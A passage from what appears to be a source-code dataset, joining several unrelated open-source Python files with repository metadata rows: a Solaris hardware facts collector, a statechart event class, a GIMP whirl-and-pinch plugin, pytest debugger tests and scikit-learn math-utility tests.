lines = (line for line in out.split('\n') if ':' in line and line.split(':')[1] == instance)
for line in lines:
text, value = line.split('\t')
stat = text.split(':')[3]
if stat == 'Size':
d[disk_stats.get(stat)] = bytes_to_human(float(value))
else:
d[disk_stats.get(stat)] = value.rstrip()
diskname = 'sd' + instance
device_facts['devices'][diskname] = d
d = {}
return device_facts
def get_uptime_facts(self):
uptime_facts = {}
# On Solaris, unix:0:system_misc:snaptime is created shortly after machine boots up
# and displays tiem in seconds. This is much easier than using uptime as we would
# need to have a parsing procedure for translating from human-readable to machine-readable
# format.
# Example output:
# unix:0:system_misc:snaptime 1175.410463590
rc, out, err = self.module.run_command('/usr/bin/kstat -p unix:0:system_misc:snaptime')
if rc != 0:
return
uptime_facts['uptime_seconds'] = int(float(out.split('\t')[1]))
return uptime_facts
class SunOSHardwareCollector(HardwareCollector):
_fact_class = SunOSHardware
_platform = 'SunOS'
| gpl-3.0 | 8,220,107,935,792,656,000 | 35.173585 | 108 | 0.566555 | false |
AlexandreDecan/sismic | sismic/model/events.py | 1 | 2623 | import warnings
from typing import Any
__all__ = ['Event', 'InternalEvent', 'MetaEvent']
class Event:
"""
An event with a name and (optionally) some data passed as named parameters.
The list of parameters can be obtained using *dir(event)*. Notice that
*name* and *data* are reserved names. If a *delay* parameter is provided,
then this event will be considered as a delayed event (and won't be
executed until given delay has elapsed).
When two events are compared, they are considered equal if their names
and their data are equal.
:param name: name of the event.
:param data: additional data passed as named parameters.
"""
__slots__ = ['name', 'data']
def __init__(self, name: str, **additional_parameters: Any) -> None:
self.name = name
self.data = additional_parameters
def __eq__(self, other):
if isinstance(other, Event):
return (self.name == other.name and self.data == other.data)
else:
return NotImplemented
def __getattr__(self, attr):
try:
return self.data[attr]
except KeyError:
raise AttributeError('{} has no attribute {}'.format(self, attr))
def __getstate__(self):
# For pickle and implicitly for multiprocessing
return self.name, self.data
def __setstate__(self, state):
# For pickle and implicitly for multiprocessing
self.name, self.data = state
def __hash__(self):
return hash(self.name)
def __dir__(self):
return ['name'] + list(self.data.keys())
def __repr__(self):
if self.data:
return '{}({!r}, {})'.format(
self.__class__.__name__, self.name, ', '.join(
'{}={!r}'.format(k, v) for k, v in self.data.items()))
else:
return '{}({!r})'.format(self.__class__.__name__, self.name)
class InternalEvent(Event):
"""
Subclass of Event that represents an internal event.
"""
pass
class DelayedEvent(Event):
"""
An event that is delayed.
Deprecated since 1.4.0, use `Event` with a `delay` parameter instead.
"""
def __init__(self, name: str, delay: float, **additional_parameters: Any) -> None:
warnings.warn(
'DelayedEvent is deprecated since 1.4.0, use Event with a delay parameter instead.',
DeprecationWarning)
super().__init__(name, delay=delay, **additional_parameters)
class MetaEvent(Event):
"""
Subclass of Event that represents a MetaEvent, as used in property statecharts.
"""
pass
| lgpl-3.0 | -4,263,694,073,331,279,000 | 28.47191 | 96 | 0.599695 | false |
Bootz/shiny-robot | plug-ins/pygimp/plug-ins/whirlpinch.py | 16 | 9500 | #!/usr/bin/env python
# Gimp-Python - allows the writing of Gimp plugins in Python.
# Copyright (C) 1997 James Henstridge <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Algorithms stolen from the whirl and pinch plugin distributed with Gimp,
# by Federico Mena Quintero and Scott Goehring
#
# This version does the same thing, except there is no preview, and it is
# written in python and is slower.
import math, struct
from gimpfu import *
class pixel_fetcher:
def __init__(self, drawable):
self.col = -1
self.row = -1
self.img_width = drawable.width
self.img_height = drawable.height
self.img_bpp = drawable.bpp
self.img_has_alpha = drawable.has_alpha
self.tile_width = gimp.tile_width()
self.tile_height = gimp.tile_height()
self.bg_colour = '\0\0\0\0'
self.bounds = drawable.mask_bounds
self.drawable = drawable
self.tile = None
def set_bg_colour(self, r, g, b, a):
self.bg_colour = struct.pack('BBB', r,g,b)
if self.img_has_alpha:
self.bg_colour = self.bg_colour + chr(a)
def get_pixel(self, x, y):
sel_x1, sel_y1, sel_x2, sel_y2 = self.bounds
if x < sel_x1 or x >= sel_x2 or y < sel_y1 or y >= sel_y2:
return self.bg_colour
col = x / self.tile_width
coloff = x % self.tile_width
row = y / self.tile_height
rowoff = y % self.tile_height
if col != self.col or row != self.row or self.tile == None:
self.tile = self.drawable.get_tile(False, row, col)
self.col = col
self.row = row
return self.tile[coloff, rowoff]
class Dummy:
pass
def whirl_pinch(image, drawable, whirl, pinch, radius):
self = Dummy()
self.width = drawable.width
self.height = drawable.height
self.bpp = drawable.bpp
self.has_alpha = drawable.has_alpha
self.bounds = drawable.mask_bounds
self.sel_x1, self.sel_y1, self.sel_x2, self.sel_y2 = \
drawable.mask_bounds
self.sel_w = self.sel_x2 - self.sel_x1
self.sel_h = self.sel_y2 - self.sel_y1
self.cen_x = (self.sel_x1 + self.sel_x2 - 1) / 2.0
self.cen_y = (self.sel_y1 + self.sel_y2 - 1) / 2.0
xhsiz = (self.sel_w - 1) / 2.0
yhsiz = (self.sel_h - 1) / 2.0
if xhsiz < yhsiz:
self.scale_x = yhsiz / xhsiz
self.scale_y = 1.0
elif xhsiz > yhsiz:
self.scale_x = 1.0
self.scale_y = xhsiz / yhsiz
else:
self.scale_x = 1.0
self.scale_y = 1.0
self.radius = max(xhsiz, yhsiz);
if not drawable.is_rgb and not drawable.is_grey:
return
gimp.tile_cache_ntiles(2 * (1 + self.width / gimp.tile_width()))
whirl = whirl * math.pi / 180
dest_rgn = drawable.get_pixel_rgn(self.sel_x1, self.sel_y1,
self.sel_w, self.sel_h, True, True)
pft = pixel_fetcher(drawable)
pfb = pixel_fetcher(drawable)
bg_colour = gimp.get_background()
pft.set_bg_colour(bg_colour[0], bg_colour[1], bg_colour[2], 0)
pfb.set_bg_colour(bg_colour[0], bg_colour[1], bg_colour[2], 0)
progress = 0
max_progress = self.sel_w * self.sel_h
gimp.progress_init("Whirling and pinching")
self.radius2 = self.radius * self.radius * radius
pixel = ['', '', '', '']
values = [0,0,0,0]
for row in range(self.sel_y1, (self.sel_y1+self.sel_y2)/2+1):
top_p = ''
bot_p = ''
for col in range(self.sel_x1, self.sel_x2):
q, cx, cy = calc_undistorted_coords(self, col,
row, whirl, pinch,
radius)
if q:
if cx >= 0: ix = int(cx)
else: ix = -(int(-cx) + 1)
if cy >= 0: iy = int(cy)
else: iy = -(int(-cx) + 1)
pixel[0] = pft.get_pixel(ix, iy)
pixel[1] = pft.get_pixel(ix+1, iy)
pixel[2] = pft.get_pixel(ix, iy+1)
pixel[3] = pft.get_pixel(ix+1, iy+1)
for i in range(self.bpp):
values[0] = ord(pixel[0][i])
values[1] = ord(pixel[1][i])
values[2] = ord(pixel[2][i])
values[3] = ord(pixel[3][i])
top_p = top_p + bilinear(cx,cy, values)
cx = self.cen_x + (self.cen_x - cx)
cy = self.cen_y + (self.cen_y - cy)
if cx >= 0: ix = int(cx)
else: ix = -(int(-cx) + 1)
if cy >= 0: iy = int(cy)
else: iy = -(int(-cy) + 1)
pixel[0] = pfb.get_pixel(ix, iy)
pixel[1] = pfb.get_pixel(ix+1, iy)
pixel[2] = pfb.get_pixel(ix, iy+1)
pixel[3] = pfb.get_pixel(ix+1, iy+1)
tmp = ''
for i in range(self.bpp):
values[0] = ord(pixel[0][i])
values[1] = ord(pixel[1][i])
values[2] = ord(pixel[2][i])
values[3] = ord(pixel[3][i])
tmp = tmp + bilinear(cx,cy, values)
bot_p = tmp + bot_p
else:
top_p = top_p + pft.get_pixel(col, row)
bot_p = pfb.get_pixel((self.sel_x2 - 1) -
(col - self.sel_x1), (self.sel_y2-1) -
(row - self.sel_y1)) + bot_p
dest_rgn[self.sel_x1:self.sel_x2, row] = top_p
dest_rgn[self.sel_x1:self.sel_x2, (self.sel_y2 - 1)
- (row - self.sel_y1)] = bot_p
progress = progress + self.sel_w * 2
gimp.progress_update(float(progress) / max_progress)
drawable.flush()
drawable.merge_shadow(True)
drawable.update(self.sel_x1,self.sel_y1,self.sel_w,self.sel_h)
def calc_undistorted_coords(self, wx, wy, whirl, pinch, radius):
dx = (wx - self.cen_x) * self.scale_x
dy = (wy - self.cen_y) * self.scale_y
d = dx * dx + dy * dy
inside = d < self.radius2
if inside:
dist = math.sqrt(d / radius) / self.radius
if (d == 0.0):
factor = 1.0
else:
factor = math.pow(math.sin(math.pi / 2 * dist),
-pinch)
dx = dx * factor
dy = dy * factor
factor = 1 - dist
ang = whirl * factor * factor
sina = math.sin(ang)
cosa = math.cos(ang)
x = (cosa * dx - sina * dy) / self.scale_x + self.cen_x
y = (sina * dx + cosa * dy) / self.scale_y + self.cen_y
else:
x = wx
y = wy
return inside, float(x), float(y)
def bilinear(x, y, values):
x = x % 1.0
y = y % 1.0
m0 = values[0] + x * (values[1] - values[0])
m1 = values[2] + x * (values[3] - values[2])
return chr(int(m0 + y * (m1 - m0)))
register(
"python-fu-whirl-pinch",
"Distorts an image by whirling and pinching",
"Distorts an image by whirling and pinching",
"James Henstridge (translated from C plugin)",
"James Henstridge",
"1997-1999",
"_Whirl and Pinch...",
"RGB*, GRAY*",
[
(PF_IMAGE, "image", "Input image", None),
(PF_DRAWABLE, "drawable", "Input drawable", None),
(PF_SLIDER, "whirl", "Whirl angle", 90, (-360, 360, 1)),
(PF_FLOAT, "pinch", "Pinch amount", 0),
(PF_FLOAT, "radius", "radius", 1)
],
[],
whirl_pinch, menu="<Image>/Filters/Distorts")
main()
| gpl-3.0 | 4,800,084,004,397,519,000 | 40.85022 | 79 | 0.451895 | false |
tgoodlet/pytest | testing/test_pdb.py | 5 | 11401 | import sys
import platform
import _pytest._code
import pytest
def runpdb_and_get_report(testdir, source):
p = testdir.makepyfile(source)
result = testdir.runpytest_inprocess("--pdb", p)
reports = result.reprec.getreports("pytest_runtest_logreport")
assert len(reports) == 3, reports # setup/call/teardown
return reports[1]
class TestPDB:
@pytest.fixture
def pdblist(self, request):
monkeypatch = request.getfixturevalue("monkeypatch")
pdblist = []
def mypdb(*args):
pdblist.append(args)
plugin = request.config.pluginmanager.getplugin('debugging')
monkeypatch.setattr(plugin, 'post_mortem', mypdb)
return pdblist
def test_pdb_on_fail(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
def test_func():
assert 0
""")
assert rep.failed
assert len(pdblist) == 1
tb = _pytest._code.Traceback(pdblist[0][0])
assert tb[-1].name == "test_func"
def test_pdb_on_xfail(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import pytest
@pytest.mark.xfail
def test_func():
assert 0
""")
assert "xfail" in rep.keywords
assert not pdblist
def test_pdb_on_skip(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import pytest
def test_func():
pytest.skip("hello")
""")
assert rep.skipped
assert len(pdblist) == 0
def test_pdb_on_BdbQuit(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import bdb
def test_func():
raise bdb.BdbQuit
""")
assert rep.failed
assert len(pdblist) == 0
def test_pdb_interaction(self, testdir):
p1 = testdir.makepyfile("""
def test_1():
i = 0
assert i == 1
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect(".*def test_1")
child.expect(".*i = 0")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "def test_1" not in rest
self.flush(child)
@staticmethod
def flush(child):
if platform.system() == 'Darwin':
return
if child.isalive():
child.wait()
def test_pdb_unittest_postmortem(self, testdir):
p1 = testdir.makepyfile("""
import unittest
class Blub(unittest.TestCase):
def tearDown(self):
self.filename = None
def test_false(self):
self.filename = 'debug' + '.me'
assert 0
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect('(Pdb)')
child.sendline('p self.filename')
child.sendeof()
rest = child.read().decode("utf8")
assert 'debug.me' in rest
self.flush(child)
def test_pdb_unittest_skip(self, testdir):
"""Test for issue #2137"""
p1 = testdir.makepyfile("""
import unittest
@unittest.skipIf(True, 'Skipping also with pdb active')
class MyTestCase(unittest.TestCase):
def test_one(self):
assert 0
""")
child = testdir.spawn_pytest("-rs --pdb %s" % p1)
child.expect('Skipping also with pdb active')
child.expect('1 skipped in')
child.sendeof()
self.flush(child)
def test_pdb_interaction_capture(self, testdir):
p1 = testdir.makepyfile("""
def test_1():
print("getrekt")
assert False
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect("getrekt")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "getrekt" not in rest
self.flush(child)
def test_pdb_interaction_exception(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def globalfunc():
pass
def test_1():
pytest.raises(ValueError, globalfunc)
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect(".*def test_1")
child.expect(".*pytest.raises.*globalfunc")
child.expect("(Pdb)")
child.sendline("globalfunc")
child.expect(".*function")
child.sendeof()
child.expect("1 failed")
self.flush(child)
def test_pdb_interaction_on_collection_issue181(self, testdir):
p1 = testdir.makepyfile("""
import pytest
xxx
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
#child.expect(".*import pytest.*")
child.expect("(Pdb)")
child.sendeof()
child.expect("1 error")
self.flush(child)
def test_pdb_interaction_on_internal_error(self, testdir):
testdir.makeconftest("""
def pytest_runtest_protocol():
0/0
""")
p1 = testdir.makepyfile("def test_func(): pass")
child = testdir.spawn_pytest("--pdb %s" % p1)
#child.expect(".*import pytest.*")
child.expect("(Pdb)")
child.sendeof()
self.flush(child)
def test_pdb_interaction_capturing_simple(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1():
i = 0
print ("hello17")
pytest.set_trace()
x = 3
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("x = 3")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf-8")
assert "1 failed" in rest
assert "def test_1" in rest
assert "hello17" in rest # out is captured
self.flush(child)
def test_pdb_set_trace_interception(self, testdir):
p1 = testdir.makepyfile("""
import pdb
def test_1():
pdb.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "reading from stdin while output" not in rest
self.flush(child)
def test_pdb_and_capsys(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1(capsys):
print ("hello1")
pytest.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.send("capsys.readouterr()\n")
child.expect("hello1")
child.sendeof()
child.read()
self.flush(child)
def test_set_trace_capturing_afterwards(self, testdir):
p1 = testdir.makepyfile("""
import pdb
def test_1():
pdb.set_trace()
def test_2():
print ("hello")
assert 0
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.send("c\n")
child.expect("test_2")
child.expect("Captured")
child.expect("hello")
child.sendeof()
child.read()
self.flush(child)
def test_pdb_interaction_doctest(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def function_1():
'''
>>> i = 0
>>> assert i == 1
'''
""")
child = testdir.spawn_pytest("--doctest-modules --pdb %s" % p1)
child.expect("(Pdb)")
child.sendline('i')
child.expect("0")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
self.flush(child)
def test_pdb_interaction_capturing_twice(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1():
i = 0
print ("hello17")
pytest.set_trace()
x = 3
print ("hello18")
pytest.set_trace()
x = 4
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("x = 3")
child.expect("(Pdb)")
child.sendline('c')
child.expect("x = 4")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "def test_1" in rest
assert "hello17" in rest # out is captured
assert "hello18" in rest # out is captured
self.flush(child)
def test_pdb_used_outside_test(self, testdir):
p1 = testdir.makepyfile("""
import pytest
pytest.set_trace()
x = 5
""")
child = testdir.spawn("%s %s" %(sys.executable, p1))
child.expect("x = 5")
child.sendeof()
self.flush(child)
def test_pdb_used_in_generate_tests(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def pytest_generate_tests(metafunc):
pytest.set_trace()
x = 5
def test_foo(a):
pass
""")
child = testdir.spawn_pytest(str(p1))
child.expect("x = 5")
child.sendeof()
self.flush(child)
def test_pdb_collection_failure_is_shown(self, testdir):
p1 = testdir.makepyfile("""xxx """)
result = testdir.runpytest_subprocess("--pdb", p1)
result.stdout.fnmatch_lines([
"*NameError*xxx*",
"*1 error*",
])
def test_enter_pdb_hook_is_called(self, testdir):
testdir.makeconftest("""
def pytest_enter_pdb(config):
assert config.testing_verification == 'configured'
print 'enter_pdb_hook'
def pytest_configure(config):
config.testing_verification = 'configured'
""")
p1 = testdir.makepyfile("""
import pytest
def test_foo():
pytest.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("enter_pdb_hook")
child.send('c\n')
child.sendeof()
self.flush(child)
def test_pdb_custom_cls(self, testdir):
called = []
# install dummy debugger class and track which methods were called on it
class _CustomPdb:
def __init__(self, *args, **kwargs):
called.append("init")
def reset(self):
called.append("reset")
def interaction(self, *args):
called.append("interaction")
_pytest._CustomPdb = _CustomPdb
p1 = testdir.makepyfile("""xxx """)
result = testdir.runpytest_inprocess(
"--pdbcls=_pytest:_CustomPdb", p1)
result.stdout.fnmatch_lines([
"*NameError*xxx*",
"*1 error*",
])
assert called == ["init", "reset", "interaction"]
| mit | 1,663,352,925,457,144,300 | 29.647849 | 80 | 0.513464 | false |
anirudhjayaraman/scikit-learn | sklearn/utils/tests/test_extmath.py | 70 | 16531 | # Authors: Olivier Grisel <[email protected]>
# Mathieu Blondel <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from scipy import linalg
from scipy import stats
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.extmath import density
from sklearn.utils.extmath import logsumexp
from sklearn.utils.extmath import norm, squared_norm
from sklearn.utils.extmath import randomized_svd
from sklearn.utils.extmath import row_norms
from sklearn.utils.extmath import weighted_mode
from sklearn.utils.extmath import cartesian
from sklearn.utils.extmath import log_logistic
from sklearn.utils.extmath import fast_dot, _fast_dot
from sklearn.utils.extmath import svd_flip
from sklearn.utils.extmath import _batch_mean_variance_update
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils.extmath import softmax
from sklearn.datasets.samples_generator import make_low_rank_matrix
def test_density():
rng = np.random.RandomState(0)
X = rng.randint(10, size=(10, 5))
X[1, 2] = 0
X[5, 3] = 0
X_csr = sparse.csr_matrix(X)
X_csc = sparse.csc_matrix(X)
X_coo = sparse.coo_matrix(X)
X_lil = sparse.lil_matrix(X)
for X_ in (X_csr, X_csc, X_coo, X_lil):
assert_equal(density(X_), density(X))
def test_uniform_weights():
# with uniform weights, results should be identical to stats.mode
rng = np.random.RandomState(0)
x = rng.randint(10, size=(10, 5))
weights = np.ones(x.shape)
for axis in (None, 0, 1):
mode, score = stats.mode(x, axis)
mode2, score2 = weighted_mode(x, weights, axis)
assert_true(np.all(mode == mode2))
assert_true(np.all(score == score2))
def test_random_weights():
# set this up so that each row should have a weighted mode of 6,
# with a score that is easily reproduced
mode_result = 6
rng = np.random.RandomState(0)
x = rng.randint(mode_result, size=(100, 10))
w = rng.random_sample(x.shape)
x[:, :5] = mode_result
w[:, :5] += 1
mode, score = weighted_mode(x, w, axis=1)
assert_array_equal(mode, mode_result)
assert_array_almost_equal(score.ravel(), w[:, :5].sum(1))
def test_logsumexp():
# Try to add some smallish numbers in logspace
x = np.array([1e-40] * 1000000)
logx = np.log(x)
assert_almost_equal(np.exp(logsumexp(logx)), x.sum())
X = np.vstack([x, x])
logX = np.vstack([logx, logx])
assert_array_almost_equal(np.exp(logsumexp(logX, axis=0)), X.sum(axis=0))
assert_array_almost_equal(np.exp(logsumexp(logX, axis=1)), X.sum(axis=1))
def test_randomized_svd_low_rank():
# Check that extmath.randomized_svd is consistent with linalg.svd
n_samples = 100
n_features = 500
rank = 5
k = 10
# generate a matrix X of approximate effective rank `rank` and no noise
# component (very structured signal):
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.0,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
U, s, V = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
Ua, sa, Va = randomized_svd(X, k)
assert_equal(Ua.shape, (n_samples, k))
assert_equal(sa.shape, (k,))
assert_equal(Va.shape, (k, n_features))
# ensure that the singular values of both methods are equal up to the real
# rank of the matrix
assert_almost_equal(s[:k], sa)
# check the singular vectors too (while not checking the sign)
assert_almost_equal(np.dot(U[:, :k], V[:k, :]), np.dot(Ua, Va))
# check the sparse matrix representation
X = sparse.csr_matrix(X)
# compute the singular values of X using the fast approximate method
Ua, sa, Va = randomized_svd(X, k)
assert_almost_equal(s[:rank], sa[:rank])
def test_norm_squared_norm():
X = np.random.RandomState(42).randn(50, 63)
X *= 100 # check stability
X += 200
assert_almost_equal(np.linalg.norm(X.ravel()), norm(X))
assert_almost_equal(norm(X) ** 2, squared_norm(X), decimal=6)
assert_almost_equal(np.linalg.norm(X), np.sqrt(squared_norm(X)), decimal=6)
def test_row_norms():
X = np.random.RandomState(42).randn(100, 100)
sq_norm = (X ** 2).sum(axis=1)
assert_array_almost_equal(sq_norm, row_norms(X, squared=True), 5)
assert_array_almost_equal(np.sqrt(sq_norm), row_norms(X))
Xcsr = sparse.csr_matrix(X, dtype=np.float32)
assert_array_almost_equal(sq_norm, row_norms(Xcsr, squared=True), 5)
assert_array_almost_equal(np.sqrt(sq_norm), row_norms(Xcsr))
def test_randomized_svd_low_rank_with_noise():
# Check that extmath.randomized_svd can handle noisy matrices
n_samples = 100
n_features = 500
rank = 5
k = 10
# generate a matrix X wity structure approximate rank `rank` and an
# important noisy component
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.5,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
_, s, _ = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
# without the iterated power method
_, sa, _ = randomized_svd(X, k, n_iter=0)
# the approximation does not tolerate the noise:
assert_greater(np.abs(s[:k] - sa).max(), 0.05)
# compute the singular values of X using the fast approximate method with
# iterated power method
_, sap, _ = randomized_svd(X, k, n_iter=5)
# the iterated power method is helping getting rid of the noise:
assert_almost_equal(s[:k], sap, decimal=3)
def test_randomized_svd_infinite_rank():
# Check that extmath.randomized_svd can handle noisy matrices
n_samples = 100
n_features = 500
rank = 5
k = 10
# let us try again without 'low_rank component': just regularly but slowly
# decreasing singular values: the rank of the data matrix is infinite
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=1.0,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
_, s, _ = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
# without the iterated power method
_, sa, _ = randomized_svd(X, k, n_iter=0)
# the approximation does not tolerate the noise:
assert_greater(np.abs(s[:k] - sa).max(), 0.1)
# compute the singular values of X using the fast approximate method with
# iterated power method
_, sap, _ = randomized_svd(X, k, n_iter=5)
# the iterated power method is still managing to get most of the structure
# at the requested rank
assert_almost_equal(s[:k], sap, decimal=3)
def test_randomized_svd_transpose_consistency():
# Check that transposing the design matrix has limit impact
n_samples = 100
n_features = 500
rank = 4
k = 10
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.5,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
U1, s1, V1 = randomized_svd(X, k, n_iter=3, transpose=False,
random_state=0)
U2, s2, V2 = randomized_svd(X, k, n_iter=3, transpose=True,
random_state=0)
U3, s3, V3 = randomized_svd(X, k, n_iter=3, transpose='auto',
random_state=0)
U4, s4, V4 = linalg.svd(X, full_matrices=False)
assert_almost_equal(s1, s4[:k], decimal=3)
assert_almost_equal(s2, s4[:k], decimal=3)
assert_almost_equal(s3, s4[:k], decimal=3)
assert_almost_equal(np.dot(U1, V1), np.dot(U4[:, :k], V4[:k, :]),
decimal=2)
assert_almost_equal(np.dot(U2, V2), np.dot(U4[:, :k], V4[:k, :]),
decimal=2)
# in this case 'auto' is equivalent to transpose
assert_almost_equal(s2, s3)
def test_svd_flip():
# Check that svd_flip works in both situations, and reconstructs input.
rs = np.random.RandomState(1999)
n_samples = 20
n_features = 10
X = rs.randn(n_samples, n_features)
# Check matrix reconstruction
U, S, V = linalg.svd(X, full_matrices=False)
U1, V1 = svd_flip(U, V, u_based_decision=False)
assert_almost_equal(np.dot(U1 * S, V1), X, decimal=6)
# Check transposed matrix reconstruction
XT = X.T
U, S, V = linalg.svd(XT, full_matrices=False)
U2, V2 = svd_flip(U, V, u_based_decision=True)
assert_almost_equal(np.dot(U2 * S, V2), XT, decimal=6)
# Check that different flip methods are equivalent under reconstruction
U_flip1, V_flip1 = svd_flip(U, V, u_based_decision=True)
assert_almost_equal(np.dot(U_flip1 * S, V_flip1), XT, decimal=6)
U_flip2, V_flip2 = svd_flip(U, V, u_based_decision=False)
assert_almost_equal(np.dot(U_flip2 * S, V_flip2), XT, decimal=6)
def test_randomized_svd_sign_flip():
a = np.array([[2.0, 0.0], [0.0, 1.0]])
u1, s1, v1 = randomized_svd(a, 2, flip_sign=True, random_state=41)
for seed in range(10):
u2, s2, v2 = randomized_svd(a, 2, flip_sign=True, random_state=seed)
assert_almost_equal(u1, u2)
assert_almost_equal(v1, v2)
assert_almost_equal(np.dot(u2 * s2, v2), a)
assert_almost_equal(np.dot(u2.T, u2), np.eye(2))
assert_almost_equal(np.dot(v2.T, v2), np.eye(2))
def test_cartesian():
# Check if cartesian product delivers the right results
axes = (np.array([1, 2, 3]), np.array([4, 5]), np.array([6, 7]))
true_out = np.array([[1, 4, 6],
[1, 4, 7],
[1, 5, 6],
[1, 5, 7],
[2, 4, 6],
[2, 4, 7],
[2, 5, 6],
[2, 5, 7],
[3, 4, 6],
[3, 4, 7],
[3, 5, 6],
[3, 5, 7]])
out = cartesian(axes)
assert_array_equal(true_out, out)
# check single axis
x = np.arange(3)
assert_array_equal(x[:, np.newaxis], cartesian((x,)))
def test_logistic_sigmoid():
# Check correctness and robustness of logistic sigmoid implementation
naive_logistic = lambda x: 1 / (1 + np.exp(-x))
naive_log_logistic = lambda x: np.log(naive_logistic(x))
x = np.linspace(-2, 2, 50)
assert_array_almost_equal(log_logistic(x), naive_log_logistic(x))
extreme_x = np.array([-100., 100.])
assert_array_almost_equal(log_logistic(extreme_x), [-100, 0])
def test_fast_dot():
# Check fast dot blas wrapper function
if fast_dot is np.dot:
return
rng = np.random.RandomState(42)
A = rng.random_sample([2, 10])
B = rng.random_sample([2, 10])
try:
linalg.get_blas_funcs(['gemm'])[0]
has_blas = True
except (AttributeError, ValueError):
has_blas = False
if has_blas:
# Test _fast_dot for invalid input.
# Maltyped data.
for dt1, dt2 in [['f8', 'f4'], ['i4', 'i4']]:
assert_raises(ValueError, _fast_dot, A.astype(dt1),
B.astype(dt2).T)
# Malformed data.
## ndim == 0
E = np.empty(0)
assert_raises(ValueError, _fast_dot, E, E)
## ndim == 1
assert_raises(ValueError, _fast_dot, A, A[0])
## ndim > 2
assert_raises(ValueError, _fast_dot, A.T, np.array([A, A]))
## min(shape) == 1
assert_raises(ValueError, _fast_dot, A, A[0, :][None, :])
# test for matrix mismatch error
assert_raises(ValueError, _fast_dot, A, A)
# Test cov-like use case + dtypes.
for dtype in ['f8', 'f4']:
A = A.astype(dtype)
B = B.astype(dtype)
# col < row
C = np.dot(A.T, A)
C_ = fast_dot(A.T, A)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A.T, B)
C_ = fast_dot(A.T, B)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A, B.T)
C_ = fast_dot(A, B.T)
assert_almost_equal(C, C_, decimal=5)
# Test square matrix * rectangular use case.
A = rng.random_sample([2, 2])
for dtype in ['f8', 'f4']:
A = A.astype(dtype)
B = B.astype(dtype)
C = np.dot(A, B)
C_ = fast_dot(A, B)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A.T, B)
C_ = fast_dot(A.T, B)
assert_almost_equal(C, C_, decimal=5)
if has_blas:
for x in [np.array([[d] * 10] * 2) for d in [np.inf, np.nan]]:
assert_raises(ValueError, _fast_dot, x, x.T)
def test_incremental_variance_update_formulas():
# Test Youngs and Cramer incremental variance formulas.
# Doggie data from http://www.mathsisfun.com/data/standard-deviation.html
A = np.array([[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300]]).T
idx = 2
X1 = A[:idx, :]
X2 = A[idx:, :]
old_means = X1.mean(axis=0)
old_variances = X1.var(axis=0)
old_sample_count = X1.shape[0]
final_means, final_variances, final_count = _batch_mean_variance_update(
X2, old_means, old_variances, old_sample_count)
assert_almost_equal(final_means, A.mean(axis=0), 6)
assert_almost_equal(final_variances, A.var(axis=0), 6)
assert_almost_equal(final_count, A.shape[0])
def test_incremental_variance_ddof():
# Test that degrees of freedom parameter for calculations are correct.
rng = np.random.RandomState(1999)
